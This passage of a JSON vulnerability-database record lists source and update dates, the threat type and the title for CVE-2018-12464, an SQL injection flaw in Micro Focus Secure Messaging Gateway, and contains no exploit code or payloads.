      {
        "date": "2018-06-29T00:00:00",
        "db": "VULHUB",
        "id": "VHN-122426"
      },
      {
        "date": "2018-06-27T00:00:00",
        "db": "BID",
        "id": "106343"
      },
      {
        "date": "2018-09-03T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      },
      {
        "date": "2018-07-31T14:49:49",
        "db": "PACKETSTORM",
        "id": "148758"
      },
      {
        "date": "2018-07-02T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201807-018"
      },
      {
        "date": "2018-06-29T16:29:00.277000",
        "db": "NVD",
        "id": "CVE-2018-12464"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-10-09T00:00:00",
        "db": "VULHUB",
        "id": "VHN-122426"
      },
      {
        "date": "2018-06-27T00:00:00",
        "db": "BID",
        "id": "106343"
      },
      {
        "date": "2018-09-03T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      },
      {
        "date": "2019-10-17T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201807-018"
      },
      {
        "date": "2024-11-21T03:45:16.117000",
        "db": "NVD",
        "id": "CVE-2018-12464"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-018"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Micro Focus Secure Messaging Gateway In  SQL Injection vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "sql injection",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "148758"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-018"
      }
    ],
    "trust": 0.7
  }
}

